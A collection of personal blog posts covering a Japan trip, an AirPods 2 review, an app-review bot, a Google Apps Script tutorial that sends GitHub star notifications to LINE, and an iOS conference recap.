Upon arriving at the station, head straight to Kibitsu Shrine (about a 30-minute drive). It takes another 15 minutes to walk from the station to reach the shrine, which features a historic cypress corridor, ginkgo trees, and historical buildings, perfect for a leisurely visit.
There is another Kibitsu Shrine on the other side of the mountain, which you can also visit on the way, but due to time constraints, we skipped it this time.
After returning to Okayama Station, head to the nearby AEON department store to buy souvenirs, shop around, have a tempura soba lunch, and then prepare to catch the airport shuttle back to Okayama Airport.
There are many people waiting for the shuttle, but there is no need to worry about not getting on the bus, as extra buses are scheduled to ensure everyone reaches the airport.
The airport is a bit dated, similar in size to Kumamoto Airport, and by around 13:50, you will have completed security check-in and departure procedures, with about 2 hours left until the 15:25 departure time.
The airport has very few flights, with only passengers from the same flight. Check-in and baggage drop-off take less than 15 minutes. An interesting feature is that the X-ray machine at Okayama Airport is located in the airport lobby. After passing through the X-ray, seal your luggage before proceeding to check-in (if you open your luggage, you will be asked to go through security again).
After dropping off your luggage on the terminal floor (only 2 floors in total), take a stroll around. There is an observation deck for viewing, as well as a cafe and several restaurants to grab a bite to eat. When you’re tired, treat yourself to a white peach ice cream cone.
Security check is also quick, but at Okayama Airport, you need to remove your boots for the check, which can be a bit inconvenient.
The flight was delayed, so I waited in the boarding area until we finally took off at 16:24 (almost an hour late).
Farewell, Okayama, farewell, Hiroshima.
Following the “2023 Kyushu 10-Day Solo Trip” a few days ago, there was a lingering sense of loneliness, being alone in unfamiliar places and hardly speaking any Japanese for 10 days. The memory of that loneliness remains fresh, so there isn’t much desire to go back. The trip was mainly due to the upcoming work commitments and the opportunity of getting a super discounted flight ticket.
On the first day, while exchanging for the JR Pass, I coincidentally got stuck, met a group of Taiwanese who were also stuck, took turns trying with them, and coincidentally, she was also heading to Hiroshima. We both bought tickets for the next train, coincidentally both wanted to go to the convenience store first, and coincidentally, we were in the same industry, so we had a lot to talk about. Both traveling alone, we ended up forming a group and completing the same itinerary together on the first day.
Many itineraries, attractions, and time arrangements are provided by Angie. If I were to travel on my own, I might wander around or miss out, and end up walking alone for 6 days.
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
When AirPods first came out, I didn’t pay much attention; at first glance, they just looked like a showerhead-shaped wireless Bluetooth earphone. At that time, the wireless Bluetooth earphone market was also very competitive, with various styles and needs being met, and the price wasn’t friendly either. What was so special about it?
It wasn’t until I actually got my hands on it that I felt its “amazing” aspect. Since its launch, AirPods have consistently ranked among the top in Bluetooth earphone sales, not just because of Apple fans’ loyalty. So, what’s so good about it? Let’s continue to find out.
I was originally just a simple iPhone user. Last year, I got a MacBook Pro and an Apple Watch S4, and started falling into the Apple ecosystem (commonly known as the Apple Family Bucket). Having bought the watch, the only thing missing was a pair of earphones.
The Bluetooth earphones I was using had been in service for a while. They were decent, not bad but not particularly outstanding either. The sound quality was average, and the battery life was good. The pain points were unclear calls, signal interference, long press to turn on/off, pairing wait time, and unclear battery indicators. These were all minor issues. I mainly used them for commuting and exercising, and mostly used speakers or wired earphones in front of the computer, so they met my basic needs.
After the launch of AirPods 1st generation, most of my friends had good experiences with them. This time, I decided to follow the trend and get the AirPods 2nd generation.
p.s. Since I haven’t used the 1st generation, my considerations for purchasing won’t include comparisons with the 1st generation (this article also won’t mention differences with the 1st generation).
The price difference between the wireless and wired versions is $1,200. Initially, I considered buying the wireless version, thinking about the messy charging cables on my bedside table and the convenience of carrying one less cable when traveling.
After Apple announced the cancellation of AirPower, I searched online for similar products and bought a 2-in-1 wireless charging pad for iPhone and Apple Watch. Since iPhone and AirPods don’t need to be charged simultaneously, it could be used as a 3-in-1 alternately.
Everything seemed perfect until I received the product and found that it couldn’t charge the phone and watch simultaneously. The watch’s charging was almost zero, and the speed was very slow. Even using a 5.1V/2.1A adapter didn’t help. I wasn’t sure what voltage adapter to use. Checking online reviews, this issue wasn’t isolated. I ended up returning it.
After thinking about it, it’s just two cables (AirPods and iPhone both use lightning/Apple Watch has a dedicated cable), and wired charging is faster. Wireless charging requires the pad, the cable, and possibly a larger adapter. Comparatively, there’s no significant convenience advantage.
So I ultimately chose the wired version of AirPods 2.
p.s. The difference between the wireless and wired versions is only in the charging case. The wired version is the same as the 1st generation (indicator light inside); the wireless version has the indicator light outside and can also be charged with a cable.
From announcement to sale (in Taiwan), it took about a month. I checked the official website daily, hoping it was available, just like many other netizens XD. The wait was agonizing, as other countries had already started selling!
On 4/23, as soon as it was available, I placed my order. AirPods 2 offers laser engraving (engraving), so I couldn’t resist and had it engraved:
ΛVICII ◢ ◤ — Official Preview Image
In memory of the Swedish legendary music producer AVICII
“One day you’ll leave this world behind So live a life you will remember.” Avicii — The Nights
Can engrave 11 characters, including Chinese/English/symbols/spaces; in practice, most symbols should work. If not supported, it will display “Unable to engrave these characters:”, so no need to worry about garbled text.
p.s. Engraving requires an additional week of waiting. Without engraving, you can buy directly at 101 or through a dealer (at a cheaper price).
The official estimated delivery time is: 5/3~5/10. On 4/29, I was notified that it was shipped from Shanghai, and luckily, I received it on 4/30 before the May Day holiday (super fast!! from Shanghai to Taipei).
Outer Packaging
Unfolded
Close-up of the Body
Full Body Shot
Contents Inside
Unboxing ends! The overall feel is substantial, with excellent hand feel and texture. The engraving is also very delicate; it meets the standard of Apple products!
For the first use of brand new AirPods, just open the AirPods case near the iPhone, and it will prompt you to complete the pairing; no need to press the pairing button.
Mobile Version:
Open “Settings” -> “Bluetooth” -> “Find your AirPods” -> “Settings”
MacBook Version:
Top-left Apple menu -> "System Preferences" -> "Bluetooth" (if there is no sound, change the sound output to AirPods)
You can choose the double-tap action for the left and right ear.
Tap position is below the small hole on the upper side of the earphone body:
I actually figured out the position after some exploration
Quickly switch back to using on iPhone:
Pull up the menu -> Select the audio block -> Select the top right icon -> Switch to AirPods
You can also check the AirPods battery here. (Shows the battery of the one with lower battery)
Method to check battery using widgets:
Swipe right to the Today View widget page -> tap "Edit" at the bottom -> find "Batteries" to add and sort it
In the future, you can go directly to the Today View widget page to check the AirPods battery (it shows the battery of the AirPod with the lower level). To see the battery of both ears and the case, you need to put one AirPod back in the case and open the lid (since the case itself does not have Bluetooth functionality):

Inside the box is the dustproof sticker I applied
There is a BUG here. If your battery widget shows the battery level and then disappears, go to “Settings” -> “Display & Brightness” -> “Text Size” -> Adjust back to the default size (third notch) and it will be fixed!
Apple Watch Battery Check Method:
Swipe up Control Center -> Tap Battery
The battery display window on the Apple Watch will also show the AirPods battery level at the bottom.
p.s. But it seems there is a bug: sometimes it won't display.
- When the AirPod battery is low, you will hear a tone in one or both AirPods. You will hear a tone once when the battery is low, and another tone before the AirPods turn off.
- If the AirPods are in the charging case and the lid is open, the indicator light shows the charging status of the AirPods. If the AirPods are not in the case, the light shows the status of the case. Green means fully charged, and amber means less than one full charge remains.
— Taken from official documentation
Before sharing my experience, let me mention a recent entrepreneurial story I heard; in short, it goes: “When making a product, we should not target a wide range but choose a small niche and gradually expand.”
The biggest difference between AirPods and other brands of Bluetooth earphones is the impeccable attention to small details. For example, when you take one earbud out, the music automatically pauses, and it resumes when you put it back. You can use them directly when taken out, and put them back when not in use, without worrying about turning them on or off or connecting them. In terms of comfort, you can hardly feel their presence when wearing them.
The charging speed is incredibly fast, and they automatically charge when placed in the case. So you only need to occasionally check if the case has power (the case can charge the AirPods about 5 times). You won’t encounter the issue of needing to use Bluetooth earphones only to find them out of power and having to wait for them to charge slowly.
The latency is as rumored; you can hardly feel any delay when watching videos or playing games (I tested it with a racing game).
Hey Siri feature, at first, I thought it was redundant since I have a watch that can also activate Hey Siri from a distance. But after actual use, as mentioned above, it’s all about “detail experience.” The Hey Siri feature on AirPods is on another level; you don’t even need to raise your hand to activate it. Just call out Hey Siri, and it works, truly making Siri feel omnipresent. This feature is particularly convenient when doing housework or holding things in both hands. Additionally, you can call Siri to adjust the volume: “Hey Siri! Louder,” “Hey Siri! Set volume to 75%.”
In summary, using AirPods feels like:
“Everything is so natural.”
You don’t need to focus on unnecessary things; earphones should just be earphones.
Call quality is also impressive. Besides stable basic call quality, the microphone quality is comparable to that of a professional mic, which is amazing. In my test call with a friend, he couldn’t even tell I was using AirPods!
Wearing while riding: I was initially excited to wear them while riding to listen to navigation. However, a friend who already had the first generation said, "No," because with 3/4-coverage or fuller helmets, putting the helmet on presses on your ears, making the earphones easy to fall off. My actual test confirmed this, so I suggest wearing only one earbud while riding, for safety.
I still need to mention some drawbacks I found.
The number of gestures you can control is too limited. I’m really used to controlling volume with gestures (though fortunately, I can control Spotify volume with my watch).
Also, while the connection speed to the phone is indeed fast, the connection speed to the computer is slow. My MacBook Pro 2018 is quite slow, but my other Mac Mini connects as quickly as the phone.
The TESTV review channel also mentioned that their MacBook Pro, when used with an external display while closed, would have intermittent signal issues with AirPods (I haven’t experienced this).
Why are there these differences? I guess it’s due to other signal interferences (lights, screen output, other Bluetooth devices)?
"The size and shape are the same as wired EarPods, so they fall out easily": in fact, the size and shape are different from EarPods. I find EarPods a bit loose, but AirPods feel very stable, even when jumping around. However, this varies from person to person; some people may indeed find them unsuitable. I recommend borrowing a friend's AirPods to try before buying! *Or stick some artificial skin on the earphone head to increase the contact area and friction.
"The sound quality is the same as EarPods": as mentioned above, there is actually a big difference; AirPods have much better sound quality. Although they may not match similarly priced earphones that focus on sound quality, and they lack noise cancellation, AirPods are not designed around sound quality; it's a trade-off based on personal preference. In my experience, the sound is immersive with a wide range, and overall it doesn't disappoint!
Since I have butterfingers, AirPods are like an egg to me, and I’m afraid I’ll drop and break them. After reading many protective case recommendations, many people recommended this one: Catalyst AirPods Waterproof Case (Protective Case).
The reasons for choosing this are: waterproof, drop-proof, has a hook, and is convenient to use (you don’t need to remove it when taking out the earphones or charging).
Price: Around $1000
[Video](http://www.youtube.com/watch?v=XD8Lvp1vR1M){:target=”_blank”}
Mini Unboxing:
Front view, I bought a dark color because I’m afraid of dirt
The back also has a corresponding pairing button
You only need to flip open the top part to take out the earphones
The bottom charging port has a cover that can be opened and closed
p.s. To use the AirPods immediately, I actually bought the case before the AirPods 😂
Question from users: Can the protective case be used for both the 1st and 2nd generation?
The distinction is not between the 1st and 2nd generation but between the wired and wireless charging case. With the wired charging case, both the 1st and 2nd generations can use it. The wireless charging case has an indicator light on the outside and its pairing button sits closer to the center of the back, so it cannot share the same protective case with the wired version. Please note this ⚠️
AHA AirPods Dustproof Sticker
Question from users about the fit:
If not applied properly, it won’t fit well. I had to adjust it for a long time to make it fit perfectly. The edges might feel a bit rough (not affecting usage, possibly due to tolerance?).
It’s not easy to apply because the dustproof sticker is a metal piece, and the case itself has a magnet that easily attracts it when you’re trying to align it.
Currently, I feel it’s a bit redundant. I’m not sure how effective it will be after some time, so I’m reserving judgment for now.
Please be especially careful, as there are now high-quality counterfeit versions with cracked chips that also show pairing animations and battery levels, making it almost impossible to distinguish from the real ones by appearance.
The main ways to identify them currently are through software:
However, it’s uncertain if future counterfeit versions will fix these issues, so it’s safer to buy from official or large retail channels.
Recently, on Facebook and Google ad networks, I found unscrupulous merchants selling counterfeits at prices close to the genuine ones (the website is a typical one-page scam site), which is truly malicious. If you are trying to save money and buy “AirPods” for around NT$1,000, you should at least be aware that they are likely fake; but selling counterfeits at genuine prices is extremely low!
Please note: the price of brand-new AirPods should not be lower than NT$4,500.
Scam, unknown sellers
If you accidentally placed an order, refuse to accept it if it’s cash on delivery. If you have already received it, immediately call the courier company to request a return (be firm). If you have any issues, you can join the FB Shopping Ad Victims Self-Help Group.
If you see such ads, directly click the top right corner to report to Facebook/Google, or click the ad repeatedly to quickly burn through their ad budget.
Additionally, if you find counterfeit AirPods or Apple products, do not tolerate them. Whether it’s from unknown websites, one-page shopping scams, Shopee, or Ruten, make sure to contact the Intellectual Property Protection Brigade to handle it.
Second generation box image
Please confirm:
For detailed comparison between the 1st and 2nd generation, please refer to this article: AirPods First Generation vs Second Generation Identification Tips, Distinguish Them with These 5 Tricks
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A free and open-source Slack bot for tracking the latest iOS & Android app reviews
Now redesigned using the new App Store Connect API and relaunched as “ZReviewTender — Free and Open-source App Reviews Monitoring Bot”.
====
ZReviewsBot is a free, open-source project that helps your app team automatically track the latest reviews of apps on the App Store (iOS) and Google Play (Android) platforms and send them to a designated Slack Channel for you to understand the current app status in real-time.
The App Store Connect API now supports reading and managing Customer Reviews; this bot will adopt it in a future update, replacing the current approach of fetching reviews from the backend via Fastlane — Spaceship.
Following the previous article “AppStore APP’s Reviews Slack Bot”, I researched and completed a new iOS review-fetching tool, and figured it was worth open-sourcing as a side project for anyone facing the same problem.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Writing a GAS script to connect to a GitHub Webhook and forward star notifications to LINE
As a maintainer of open-source projects, it’s not for money or fame, but for a sense of vanity; every time I see a new ⭐️ star, I feel a secret joy in my heart. It means that the project I spent time and effort on is really being used and is helpful to friends with the same problems.
Therefore, I have a bit of an obsession with observing ⭐️ stars, frequently refreshing Github to see if the number of ⭐️ stars has increased. I wondered if there was a more proactive way to get notifications when someone stars the repo, without having to manually check.
First, I considered looking for existing tools to achieve this. I searched Github Marketplace and found some tools created by experts.
I tried a few of them, but the results were not as expected. Some were no longer working, some only sent notifications every 5/10/20 stars (I’m just a small developer, even 1 new ⭐️ makes me happy 😝), and some only sent email notifications, but I wanted SNS notifications.
Moreover, installing an app just for “vanity” didn’t feel right, and I was concerned about potential security risks.
The Github App on iOS or third-party apps like GitTrends also do not support this feature.
Based on the above, we can actually use Google Apps Script to quickly and freely create our own Github Repo Star Notifier.
This article uses Line as the notification medium. If you want to use other messaging apps, you can ask ChatGPT how to implement it.
Ask ChatGPT how to implement Line Notify
- `lineToken`: a LINE Notify personal access token (I named mine “Github Repo Notifier: XXXX”) issued for a 1-on-1 chat with LINE Notify, used to send messages to myself via the LINE Notify official bot.
- `githubWebhookSecret`: a random string we will use as the request-verification secret between the GitHub Webhook and Google Apps Script. Due to GAS limitations, the request `Headers` cannot be read inside `doPost(e)`, so the standard GitHub Webhook signature verification cannot be used; string-matching verification can only be done manually with a `?secret=` query parameter.
Go to Google Apps Script, click the top left corner “+ New Project”.
Click the top left “Untitled project” to rename the project.
Here I named the project My-Github-Repo-Notifier for easy identification in the future.
Code input area:
// Constant variables
+const lineToken = 'XXXX';
+// Generate yours line notify bot token: https://notify-bot.line.me/my/
+const githubWebhookSecret = "XXXXX";
+// Generate yours secret string here: https://www.random.org/strings/?num=1&len=32&digits=on&upperalpha=on&loweralpha=on&unique=on&format=html&rnd=new
+
+// HTTP Get/Post Handler
+// Do not open Get method
+function doGet(e) {
+ return HtmlService.createHtmlOutput("Access Denied!");
+}
+
+// Github Webhook will use Post method to come in
+function doPost(e) {
+ const content = JSON.parse(e.postData.contents);
+
+ // Security check to ensure the request is from Github Webhook
+ if (verifyGitHubWebhook(e) == false) {
+ return HtmlService.createHtmlOutput("Access Denied!");
+ }
+
+ // star payload data content["action"] == "started"
+ if(content["action"] != "started") {
+ return HtmlService.createHtmlOutput("OK!");
+ }
+
+ // Combine message
+ const message = makeMessageString(content);
+
+ // Send message, can also be sent to Slack, Telegram...
+ sendLineNotifyMessage(message);
+
+ return HtmlService.createHtmlOutput("OK!");
+}
+
+// Method
+// Generate message content
+function makeMessageString(content) {
+ const repository = content["repository"];
+ const repositoryName = repository["name"];
+ const repositoryURL = repository["svn_url"];
+ const starsCount = repository["stargazers_count"];
+ const forksCount = repository["forks_count"];
+
+ const starrer = content["sender"]["login"];
+
+ var message = "🎉🎉「"+starrer+"」starred your「"+repositoryName+"」Repo 🎉🎉\n";
+ message += "Current total stars: "+starsCount+"\n";
+ message += "Current total forks: "+forksCount+"\n";
+ message += repositoryURL;
+
+ return message;
+}
+
+// Verify if the request is from Github Webhook
+// Due to GAS limitations (https://issuetracker.google.com/issues/67764685?pli=1)
+// Cannot obtain Headers content
+// Therefore, the standard Github Webhook verification method (https://docs.github.com/en/webhooks-and-events/webhooks/securing-your-webhooks)
+// Can only be manually matched with ?secret=XXX
+function verifyGitHubWebhook(e) {
+ if (e.parameter["secret"] === githubWebhookSecret) {
+ return true
+ } else {
+ return false
+ }
+}
+
+// -- Send Message --
+// Line
+// Other message sending methods can ask ChatGPT
+function sendLineNotifyMessage(message) {
+ var url = 'https://notify-api.line.me/api/notify';
+
+ var options = {
+ method: 'post',
+ headers: {
+ 'Authorization': 'Bearer '+lineToken
+ },
+ payload: {
+ 'message': message
+ }
+ };
+ UrlFetchApp.fetch(url, options);
+}
+
`lineToken` & `githubWebhookSecret` carry the values copied from the previous step.
For reference, the GitHub Webhook payload sent when someone presses Star looks like this:
{
+ "action": "created",
+ "starred_at": "2023-08-01T03:42:26Z",
+ "repository": {
+ "id": 602927147,
+ "node_id": "R_kgDOI-_wKw",
+ "name": "ZMarkupParser",
+ "full_name": "ZhgChgLi/ZMarkupParser",
+ "private": false,
+ "owner": {
+ "login": "ZhgChgLi",
+ "id": 83232222,
+ "node_id": "MDEyOk9yZ2FuaXphdGlvbjgzMjMyMjIy",
+ "avatar_url": "https://avatars.githubusercontent.com/u/83232222?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/ZhgChgLi",
+ "html_url": "https://github.com/ZhgChgLi",
+ "followers_url": "https://api.github.com/users/ZhgChgLi/followers",
+ "following_url": "https://api.github.com/users/ZhgChgLi/following{/other_user}",
+ "gists_url": "https://api.github.com/users/ZhgChgLi/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/ZhgChgLi/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/ZhgChgLi/subscriptions",
+ "organizations_url": "https://api.github.com/users/ZhgChgLi/orgs",
+ "repos_url": "https://api.github.com/users/ZhgChgLi/repos",
+ "events_url": "https://api.github.com/users/ZhgChgLi/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/ZhgChgLi/received_events",
+ "type": "Organization",
+ "site_admin": false
+ },
+ "html_url": "https://github.com/ZhgChgLi/ZMarkupParser",
+ "description": "ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.",
+ "fork": false,
+ "url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser",
+ "forks_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/forks",
+ "keys_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/teams",
+ "hooks_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/hooks",
+ "issue_events_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/events",
+ "assignees_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/tags",
+ "blobs_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/languages",
+ "stargazers_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/stargazers",
+ "contributors_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/contributors",
+ "subscribers_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/subscribers",
+ "subscription_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/subscription",
+ "commits_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/merges",
+ "archive_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/downloads",
+ "issues_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/labels{/name}",
+ "releases_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/ZhgChgLi/ZMarkupParser/deployments",
+ "created_at": "2023-02-17T08:41:37Z",
+ "updated_at": "2023-08-01T03:42:27Z",
+ "pushed_at": "2023-08-01T00:07:41Z",
+ "git_url": "git://github.com/ZhgChgLi/ZMarkupParser.git",
+ "ssh_url": "git@github.com:ZhgChgLi/ZMarkupParser.git",
+ "clone_url": "https://github.com/ZhgChgLi/ZMarkupParser.git",
+ "svn_url": "https://github.com/ZhgChgLi/ZMarkupParser",
+ "homepage": "https://zhgchg.li",
+ "size": 27449,
+ "stargazers_count": 187,
+ "watchers_count": 187,
+ "language": "Swift",
+ "has_issues": true,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": true,
+ "has_pages": false,
+ "has_discussions": false,
+ "forks_count": 10,
+ "mirror_url": null,
+ "archived": false,
+ "disabled": false,
+ "open_issues_count": 2,
+ "license": {
+ "key": "mit",
+ "name": "MIT License",
+ "spdx_id": "MIT",
+ "url": "https://api.github.com/licenses/mit",
+ "node_id": "MDc6TGljZW5zZTEz"
+ },
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cocoapods",
+ "html",
+ "html-converter",
+ "html-parser",
+ "html-renderer",
+ "ios",
+ "nsattributedstring",
+ "swift",
+ "swift-package",
+ "textfield",
+ "uikit",
+ "uilabel",
+ "uitextview"
+ ],
+ "visibility": "public",
+ "forks": 10,
+ "open_issues": 2,
+ "watchers": 187,
+ "default_branch": "main"
+ },
+ "organization": {
+ "login": "ZhgChgLi",
+ "id": 83232222,
+ "node_id": "MDEyOk9yZ2FuaXphdGlvbjgzMjMyMjIy",
+ "url": "https://api.github.com/orgs/ZhgChgLi",
+ "repos_url": "https://api.github.com/orgs/ZhgChgLi/repos",
+ "events_url": "https://api.github.com/orgs/ZhgChgLi/events",
+ "hooks_url": "https://api.github.com/orgs/ZhgChgLi/hooks",
+ "issues_url": "https://api.github.com/orgs/ZhgChgLi/issues",
+ "members_url": "https://api.github.com/orgs/ZhgChgLi/members{/member}",
+ "public_members_url": "https://api.github.com/orgs/ZhgChgLi/public_members{/member}",
+ "avatar_url": "https://avatars.githubusercontent.com/u/83232222?v=4",
+ "description": "Building a Better World Together."
+ },
+ "sender": {
+ "login": "zhgtest",
+ "id": 4601621,
+ "node_id": "MDQ6VXNlcjQ2MDE2MjE=",
+ "avatar_url": "https://avatars.githubusercontent.com/u/4601621?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/zhgtest",
+ "html_url": "https://github.com/zhgtest",
+ "followers_url": "https://api.github.com/users/zhgtest/followers",
+ "following_url": "https://api.github.com/users/zhgtest/following{/other_user}",
+ "gists_url": "https://api.github.com/users/zhgtest/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/zhgtest/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/zhgtest/subscriptions",
+ "organizations_url": "https://api.github.com/users/zhgtest/orgs",
+ "repos_url": "https://api.github.com/users/zhgtest/repos",
+ "events_url": "https://api.github.com/users/zhgtest/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/zhgtest/received_events",
+ "type": "User",
+ "site_admin": false
+ }
+}
+
After finishing the code, click “Deploy” in the upper right corner -> “New deployment”:
On the left side, select the type “Web App”:
Set access (“Who has access”) to “Anyone”.
For the first deployment, you need to click “Grant access”:
After the account selection pop-up appears, select your current Gmail account:
The “Google hasn’t verified this app” message appears because the app we are developing is for personal use and does not need Google verification.
Simply click “Advanced” -> “Go to XXX (unsafe)” -> “Allow”:
After deployment, you can get the Request URL in the “Web App” section of the result page. Click “Copy” and note down this GAS URL.
⚠️️️ Side note, please note that if the code is modified, you need to update the deployment for it to take effect ⚠️
To make the modified code take effect, similarly click “Deploy” in the upper right corner -> select “Manage deployments” -> select the “✏️” in the upper right corner -> version selection “Create new version” -> click “Deploy”.
This completes the code update deployment.
Enter Organizations / Repo -> “Settings” -> find “Webhooks” on the left -> “Add webhook”:
In the “Payload URL” field, enter the GAS URL and manually append our own security verification string ?secret=githubWebhookSecret to the end of the URL. For example, if your GAS URL is https://script.google.com/macros/s/XXX/exec and githubWebhookSecret is 123456, then the URL is: https://script.google.com/macros/s/XXX/exec?secret=123456
Set the “Content type” to application/json.
Go back to the configured Organization/Repo and click “Star” (or un-star and then “Star” again):
You will receive a push notification!
Done! 🎉🎉🎉🎉
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Hot-off-the-press recap of attending iPlayground 2019
Last year it was held in mid-October, right after I started writing on Medium in early October to record my life, so I combined the UUID talk I heard with my attendance experience into an article. This year I’m continuing the tradition and writing up my experience to ride the wave of attention!
iPlayground 2019 (This time it was also subsidized by the company for corporate tickets)
Compared to the first edition in 2018, this year has seen significant improvements in all aspects!
First, the venue. Last year it was in a basement conference hall, the space was small and felt oppressive, and it was not easy to use computers in the lecture rooms; this year it was held at the NTU Boya Hall, the venue was large and new, not crowded, and the classrooms had tables and sockets, making it convenient to use personal computers!
In terms of the agenda, in addition to domestic experts, this time foreign speakers were also invited to share in Taiwan; among them, the most popular was undoubtedly Wei Wang; this year also saw the first inclusion of workshops with hands-on teaching, but the spots were limited, so you had to be quick… I missed it while eating and chatting.
With the larger venue and more activities, the sponsor booths and the Ask-the-Speaker area made interaction much easier. From the iCHEF booth (#iCHEFxiPlayground) I got a set of eco-friendly straws and dorayaki; from the Dcard booth, another set of stickers and an eco-friendly cup sleeve this year, plus a “nihilistic quote” wet wipe; at the 17 Live booth I filled out a questionnaire for a chance to win AirPods 2; the [ weak self ] Podcast booth had stickers; and there were also booths from Grindr, CakeResume, and Bitrise to interact with. Here is an incomplete photo of the loot.
Incomplete Loot
Food and After Party: both days had exquisite lunch boxes, plus iced coffee and tea available all day without limit. Last year had more of an After Party vibe, like listening to big names tell stories at a bar, which was very interesting; this year felt more like an afternoon tea (still with alcohol, delicious siu mai, and desserts!). We mingled on our own, and I actually made more new friends this year.
Must-have for foodies, bento photo
This part resonated with me because our project does not use third-party network libraries; instead, we encapsulate methods ourselves. Many of the design patterns and issues the speaker mentioned are also areas we need to optimize and refactor. As the speaker said:
“Garbage needs to be sorted, and so does code…”
I need to go back and study this thoroughly. I will do the sorting <( _ _ )> p.s. I didn’t get the KingFisher sticker QQ
Introduced the new method UICollectionViewCompositionalLayout available in iOS ≥ 13, which allows us to avoid subclassing UICollectionViewLayout or using CollectionView Cell wrapping CollectionView to achieve complex layouts as before. This also resonated with me because our app uses the latter method to achieve the desired design style. The pinnacle was a CollectionView Cell wrapping a CollectionView, which in turn wrapped another CollectionView (three layers), making the code messy and hard to maintain. Besides introducing the structure and usage of UICollectionViewCompositionalLayout, the speaker also created a project following this model, allowing apps before iOS 12 to support the same effects — IBPCollectionViewCompositionalLayout. Amazing!
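To make this concrete, here is a minimal sketch of my own (not code from the talk) showing how a simple two-column grid can be described declaratively with UICollectionViewCompositionalLayout instead of nesting collection views:

```swift
import UIKit

// A two-column grid: two items per horizontal group, groups stacked vertically.
func makeGridLayout() -> UICollectionViewCompositionalLayout {
    let itemSize = NSCollectionLayoutSize(widthDimension: .fractionalWidth(0.5),
                                          heightDimension: .fractionalHeight(1.0))
    let item = NSCollectionLayoutItem(layoutSize: itemSize)
    item.contentInsets = NSDirectionalEdgeInsets(top: 4, leading: 4, bottom: 4, trailing: 4)

    let groupSize = NSCollectionLayoutSize(widthDimension: .fractionalWidth(1.0),
                                           heightDimension: .absolute(120))
    let group = NSCollectionLayoutGroup.horizontal(layoutSize: groupSize, subitems: [item, item])

    let section = NSCollectionLayoutSection(group: group)
    return UICollectionViewCompositionalLayout(section: section)
}

// Usage: UICollectionView(frame: .zero, collectionViewLayout: makeGridLayout())
```

Because each section is composed of items and groups, multi-layer layouts that previously required a cell wrapping another collection view can be expressed in one place.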
I previously wrote “Let’s Make an Apple Watch App!” based on watchOS 5 using the traditional approach. I didn’t expect that we can now develop with SwiftUI! watchOS 6 supports Apple Watch Series 1 through 5, so version fragmentation is less of an issue, and practicing SwiftUI with a watch app is a good starting point (relatively simplified); I’ll find time to revamp mine. p.s. I didn’t expect watchOS developers to be so marginalized QQ. Personally, I find it quite fun and hope more people will join!
